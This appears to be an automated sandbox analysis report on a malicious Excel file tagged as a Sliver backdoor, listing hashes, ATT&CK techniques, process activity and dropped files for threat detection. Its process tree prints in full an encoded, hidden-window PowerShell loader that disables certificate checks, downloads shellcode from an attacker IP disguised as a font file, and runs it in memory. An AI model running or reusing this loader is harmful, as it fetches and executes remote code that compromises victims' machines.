sliver | 1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b

General

Target

1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b.xls
Size

46KB
MD5

9d4d6a868e20ae3090b0a97ebe51b5ce
SHA1

a40170979f8e1dff1b0a20001242bd024071fe4c
SHA256

1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b
SHA512

e9aac651935d38486fc6881d877552ed30de12bdbcde9201ae2cd6dbad1eb17b6c49e6c7300522606b3d3cfd2073e80e5a80c19d6360c05e13dcba59b4be29a7
SSDEEP

768:34SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:ISFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score

10^/10

sliver backdoor discovery execution trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	3064	1048	powershell.exe	27

Sliver RAT v2 1 IoCs

resource	yara_rule
behavioral1/memory/3064-45-0x00000000068A0000-0x000000000731E000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver

Blocklisted process makes network request 2 IoCs

flow	pid	Process
4	3064	powershell.exe
6	3064	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3064	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1048	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
3064	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3064	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
1048	EXCEL.EXE
1048	EXCEL.EXE
1048	EXCEL.EXE
1048	EXCEL.EXE
1048	EXCEL.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1048 wrote to memory of 3064	1048	EXCEL.EXE	28
PID 1048 wrote to memory of 3064	1048	EXCEL.EXE	28
PID 1048 wrote to memory of 3064	1048	EXCEL.EXE	28
PID 1048 wrote to memory of 3064	1048	EXCEL.EXE	28
PID 3064 wrote to memory of 2488	3064	powershell.exe	32
PID 3064 wrote to memory of 2488	3064	powershell.exe	32
PID 3064 wrote to memory of 2488	3064	powershell.exe	32
PID 3064 wrote to memory of 2488	3064	powershell.exe	32
PID 2488 wrote to memory of 2540	2488	csc.exe	33
PID 2488 wrote to memory of 2540	2488	csc.exe	33
PID 2488 wrote to memory of 2540	2488	csc.exe	33
PID 2488 wrote to memory of 2540	2488	csc.exe	33

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1048
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3064
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\6apyv-cj.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2488
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8641.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8640.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2540

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6apyv-cj.dll

Filesize
3KB

MD5
bfa41b18349a932f9e12022ca4207a1d

SHA1
672e05b2e8ddd714e7754781fdd3367548363902

SHA256
3bdb90384cc67fbf254901ea409ec1f1bdbfd86d913784a069a7c02f5d7be0c2

SHA512
a4b20f9e0095c8eeb6b5566f9a65e88d43bfc97d244f66a661f713953e1a055e8578e69524180714421d99d636749c84b5aee74bac557050a570fc6f5140621a

Download Submit
C:\Users\Admin\AppData\Local\Temp\6apyv-cj.pdb

Filesize
7KB

MD5
875c9c01092d0c25817e99a415b63b03

SHA1
4167e82a8e408a0b20afd0588d1eff7db8466541

SHA256
43805c4b239ab1cb6eb6e1980d96c1618389e68f5ee9b97f68e9974970f5d4b0

SHA512
a97fa9f87ee25ed056c5e52d673bbdc093e3bd672b019c30067bb49bba8913d13bfad550821f77d3c536235558b14a8b4ae3bc3c7dca58e0a3a594c17f309531

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab92DF.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8641.tmp

Filesize
1KB

MD5
e4958954769be4a0e5b4516db5e4b6f2

SHA1
c55499ecf09102c463b637d9037dd2584a3f9786

SHA256
81426fae309a4dac4822027edca43a6499464e15daa6e26cfb3a9963b529b57d

SHA512
ba9cdfcfdcff5dcea45f484fad7bddee46fc23c294bbec7db9f61247f9066041835bf105915bbbd796fa5973c738fcd12977e9bc4b0dade3cd1c413a410438ad

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\6apyv-cj.0.cs

Filesize
631B

MD5
f4dd5c682eb7b3b679f084261bfc7c4c

SHA1
70f75d7a4e42c185eb09139ed3c6f7338a2219c2

SHA256
2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

SHA512
8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\6apyv-cj.cmdline

Filesize
309B

MD5
50667e81d82ea0396407d217431b3421

SHA1
2287b97de9ccde8bbda3074ed5018f3fd1fb91f9

SHA256
c782079ff164ece512be7e95e912f4245cac1c463eb0abc4fca25a0196f16f64

SHA512
410d076841815ee00dcdb94f69f8f1b7ab194bb082738187ad8df5b5a87ba786bcd6c2c252d5cfdaf8e81d1ce453b997646035093dfa92b76e802288cb7f61de

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC8640.tmp

Filesize
652B

MD5
18cdd79a4c3f79b53642b025371f6442

SHA1
42636d5fe4e46f6ebfff39c8ad189411e8f07c9d

SHA256
133931259d58738136f2d7c9b31e5073d8c2bd2ed2ba788ac6972c84eedbe10e

SHA512
e9073291ef9fc5993f5d9ebd4d1e7d6f8fbd81279f10ba59ba3f1e04687a944f28868d2afcad007030bf72a20081b2efc72aa2bb75530856a68369df46da957b

Download Submit
memory/1048-9-0x00000000001F0000-0x00000000002F0000-memory.dmp

Filesize
1024KB

Download
memory/1048-4-0x00000000001F0000-0x00000000002F0000-memory.dmp

Filesize
1024KB

Download
memory/1048-1-0x000000007215D000-0x0000000072168000-memory.dmp

Filesize
44KB

Download
memory/1048-7-0x00000000001F0000-0x00000000002F0000-memory.dmp

Filesize
1024KB

Download
memory/1048-6-0x00000000001F0000-0x00000000002F0000-memory.dmp

Filesize
1024KB

Download
memory/1048-3-0x00000000001F0000-0x00000000002F0000-memory.dmp

Filesize
1024KB

Download
memory/1048-2-0x00000000001F0000-0x00000000002F0000-memory.dmp

Filesize
1024KB

Download
memory/1048-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1048-43-0x000000007215D000-0x0000000072168000-memory.dmp

Filesize
44KB

Download
memory/1048-44-0x00000000001F0000-0x00000000002F0000-memory.dmp

Filesize
1024KB

Download
memory/3064-45-0x00000000068A0000-0x000000000731E000-memory.dmp

Filesize
10.5MB

Download

Analysis

Sharing